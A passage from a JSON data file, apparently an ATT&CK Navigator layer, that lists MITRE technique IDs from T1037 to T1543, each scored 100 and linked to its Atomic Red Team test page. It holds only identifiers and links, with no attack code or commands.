100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","scor
e":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"
enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabl
ed":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/maste
r/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T121
6.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score"
:100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
